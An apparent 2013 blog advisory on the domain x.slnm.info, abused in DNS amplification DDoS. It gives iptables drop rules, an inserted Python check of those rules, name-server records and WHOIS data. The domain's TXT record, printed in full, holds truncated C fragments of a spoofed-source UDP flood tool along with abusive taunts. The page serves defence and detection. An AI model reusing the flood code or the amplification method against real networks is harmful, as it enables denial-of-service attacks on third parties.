Sunday, November 17, 2013

Domain: x.slnm.info

If you are seeing queries for this domain, then you are likely participating in DNS amplification attacks: your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently being DDoS-ed! Good luck.


IPtables:

There are two iptables rules available. If your distribution supports the iptables 'u32' module, pick that one; otherwise use the 'string' rule.

This rule should match any single-character subdomain of slnm.info (the label in front of slnm.info has to be exactly one byte long):

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFF00FFDF=0x01000453 && 0x2c&0xDFDFDFFF=0x4c4e4d04 && 0x30&0xDFDFDFDF=0x494e464f && 0x34&0xFF000000=0x00000000" -j DROP -m comment --comment "DROP DNS Q x.slnm.info"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 42 --to 53 --algo bm --hex-string '|04736c6e6d04696e666f00|' -j DROP -m comment --comment "DROP DNS Q x.slnm.info"

More Iptables rules for the STRING module can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt
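To see exactly what the two rules above will and will not drop before putting them on a resolver, here is an added Python example (it is not from this page nor from the smurfmonitor repository). It rebuilds the packet layout both rules assume (IPv4 header, UDP to port 53, 12-byte DNS header, then the QNAME) on constructed in-memory packets with zero checksums, and emulates the u32 clauses and the string match with the offsets, masks and hex pattern copied from the rules. Everything else (the query builder, the sample names, the helper names) is an assumption of this example. It shows that the u32 rule is case-insensitive because of the 0xDF masks while the string rule as written is case-sensitive (no --icase), that both require a one-character first label, and that the fixed offsets only hold for an IPv4 header without options (IHL 5).

```python
import struct

# Values taken from the two iptables rules on this page.
U32_TESTS = [
    (0x28, 0xFF00FFDF, 0x01000453),  # label len 1, <any byte>, label len 4, 's' (0xDF folds case)
    (0x2C, 0xDFDFDFFF, 0x4C4E4D04),  # 'lnm', label len 4
    (0x30, 0xDFDFDFDF, 0x494E464F),  # 'info'
    (0x34, 0xFF000000, 0x00000000),  # root label terminator
]
STRING_PATTERN = bytes.fromhex("04736c6e6d04696e666f00")  # |04 slnm 04 info 00|
STRING_FROM, STRING_TO = 42, 53  # xt_string scans bytes [from, to)


def build_dns_query(qname, txid=0x1234, qtype=16):
    """Minimal DNS query: 12-byte header plus one question (qtype 16 = TXT, class IN).
    Constructed sample input for the emulation below."""
    labels = b"".join(bytes([len(l)]) + l.encode() for l in qname.rstrip(".").split("."))
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # flags: RD set, QDCOUNT=1
    return header + labels + b"\x00" + struct.pack("!HH", qtype, 1)


def build_ipv4_udp(payload, ihl=5, sport=40000):
    """Wrap payload in UDP (dport 53) and IPv4 headers. Checksums are left zero: this is a
    constructed byte string for offset arithmetic, not a packet meant for the wire."""
    ip_len = ihl * 4
    ip = struct.pack("!BBHHHBBH4s4s", (4 << 4) | ihl, 0, ip_len + 8 + len(payload),
                     0, 0, 64, 17, 0, bytes([10, 0, 0, 1]), bytes([10, 0, 0, 53]))
    ip += b"\x00" * (ip_len - 20)  # IP options padding when ihl > 5
    udp = struct.pack("!HHHH", sport, 53, 8 + len(payload), 0)
    return ip + udp + payload


def u32_test(pkt, offset, mask, value):
    """One '<offset>&<mask>=<value>' clause of xt_u32: load 4 bytes big-endian
    from the start of the IP header, AND with the mask, compare."""
    if len(pkt) < offset + 4:
        return False
    word, = struct.unpack_from("!I", pkt, offset)
    return (word & mask) == value


def matches_u32_rule(pkt):
    """All clauses joined by '&&' in the u32 rule must hold."""
    return all(u32_test(pkt, *t) for t in U32_TESTS)


def matches_string_rule(pkt):
    """xt_string --from/--to: the pattern has to fit entirely inside [from, to)."""
    return STRING_PATTERN in pkt[STRING_FROM:STRING_TO]


def classify(qname, ihl=5):
    """Return (dropped_by_u32, dropped_by_string) for a query packet carrying qname."""
    pkt = build_ipv4_udp(build_dns_query(qname), ihl=ihl)
    return matches_u32_rule(pkt), matches_string_rule(pkt)


if __name__ == "__main__":
    samples = [("x.slnm.info", 5), ("a.slnm.info", 5), ("X.SLNM.INFO", 5),
               ("ab.slnm.info", 5), ("slnm.info", 5), ("x.slnm.info", 6)]
    for name, ihl in samples:
        u32, s = classify(name, ihl)
        print(f"{name:14s} ihl={ihl}  u32={u32!s:5}  string={s}")
```

Run it as a script to print the table. The last row is the caveat worth remembering: a query carrying IP options (IHL 6) shifts every offset by four bytes and slips past both rules, so these rules are a cheap first filter, not a replacement for disabling open recursion or rate-limiting responses.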

Source:


Unknown

Name server:

;; ANSWER SECTION:
slnm.info. 21600 IN NS ns1.slnm.info.
slnm.info. 21600 IN NS ns2.slnm.info.

ns1.slnm.info. 86189 IN A 199.217.118.89
ns2.slnm.info. 86189 IN A 199.217.118.89


Response:


TXT 1
Rsize: 3950



TXT record:

x.slnm.info. 81241 IN TXT "void attack(unsigned long srcip, int srcport, unsigned long destip, int destport, char *message){int s = socket (PF_INET, SOCK_RAW, IPPROTO_UDP)\;char packet[4096]\;struct iphdr *iph = (struct iphdr *)packet\;structtcphd" ">" "struct sockaddr_in sin\;struct pseudo_header psh\;sin.sin_family = AF_INET\;sin.sin_port = htons(destport)\;sin.sin_addr.s_addr = destip\; memset (packet, 0, 4096)\;iph->ihl = 5\;iph->version = 4\;iph->tos = 16\;iph->tot_len = sizeof (struct ip) + sizeof (s" ">" "iph->id = htonl (54321)\; iph->frag_off = 0\;iph->ttl = 255\;iph->protocol = IPPROTO_UDP\;iph->check = 0\;iph->saddr = srcip\;iph->daddr = sin.sin_addr.s_addr\;udph->source = htons(srcport)\;strncpy((char *)udph + sizeof (struct udphdr),message, 4096 - (si" ">" "void *thread_attack(void *thread_params){struct pthread_param *params = thread_params\;\009int i\;\009while (1)for (i = 0\; i < params->list_size\; i++)attack(params->victim_ip, rand() % 65534 + 1, params->list[i].ip, params->list[i].port, params->message)\;" ">" "printf(Usage: %s <destip> <destport> <ip_file_list> <time in seconds> <message>/n, argv[0])\;if (argc != 6){printf(JoyPowerBot: %s <destip> <destport> <ip_file_list> <time in seconds> <message>/n, argv[0])\;return -1\;}srand(time(0))\;FILE *pFile =----" ">" "param.list_size = list_size\;param.message = /xFF/xFF/xFF/xFF/x67/x65/x74/x73/x74/x61/x74/x75/x73/x10\;pthread_create( &udp_attack, NULL, thread_attack, (void*) &param)\;printf([*] Attacking../n)\;sleep(atoi(argv[4]))\;printf([!] 
Done/n)\;return 0\;------" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" 
"dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "GREATINGS:  ----FUKOFF FOR PAIN(QQ NOOB) I FUCKED UR MUM YESTERDAY.\;---- HI ALL DNSssssss. WANNA SEE 300gbit?@24/7? I WILL SHOW U, CUZ U ARE ASSHOLES\;----  QQ dnsamplication, u are the best, ty man for this blog\;)*kissing* u are doing a good work.--- " ">" "8===========================================================================================================================================================================>"


Whois


Domain ID:D51025000-LRMS
Domain Name:SLNM.INFO
Created On:16-Nov-2013 18:49:09 UTC
Last Updated On:16-Nov-2013 18:55:53 UTC
Expiration Date:16-Nov-2014 18:49:09 UTC
Sponsoring Registrar:Internet Invest, Ltd. dba Imena.ua (R503-LRMS)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Status:ADDPERIOD
Registrant ID:DI_14171185
Registrant Name:Whois privacy protection service
Registrant Organization:Internet Invest, Ltd. dba Imena.ua
Registrant Street1:Gaidara, 50 st.
Registrant Street2:
Registrant Street3:
Registrant City:Kyiv
Registrant State/Province:
Registrant Postal Code:01033
Registrant Country:UA
Registrant Phone:+380.442010102
Registrant Phone Ext.:
Registrant FAX:+380.442010100
Registrant FAX Ext.:
Registrant Email:hostmaster@imena.ua
Admin ID:DI_14171185
Admin Name:Whois privacy protection service
Admin Organization:Internet Invest, Ltd. dba Imena.ua
Admin Street1:Gaidara, 50 st.
Admin Street2:
Admin Street3:
Admin City:Kyiv
Admin State/Province:
Admin Postal Code:01033
Admin Country:UA
Admin Phone:+380.442010102
Admin Phone Ext.:
Admin FAX:+380.442010100
Admin FAX Ext.:
Admin Email:hostmaster@imena.ua
Billing ID:DI_14171185
Billing Name:Whois privacy protection service
Billing Organization:Internet Invest, Ltd. dba Imena.ua
Billing Street1:Gaidara, 50 st.
Billing Street2:
Billing Street3:
Billing City:Kyiv
Billing State/Province:
Billing Postal Code:01033
Billing Country:UA
Billing Phone:+380.442010102
Billing Phone Ext.:
Billing FAX:+380.442010100
Billing FAX Ext.:
Billing Email:hostmaster@imena.ua
Tech ID:DI_14171185
Tech Name:Whois privacy protection service
Tech Organization:Internet Invest, Ltd. dba Imena.ua
Tech Street1:Gaidara, 50 st.
Tech Street2:
Tech Street3:
Tech City:Kyiv
Tech State/Province:
Tech Postal Code:01033
Tech Country:UA
Tech Phone:+380.442010102
Tech Phone Ext.:
Tech FAX:+380.442010100
Tech FAX Ext.:
Tech Email:hostmaster@imena.ua
Name Server:NS1.SLNM.INFO
Name Server:NS2.SLNM.INFO
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
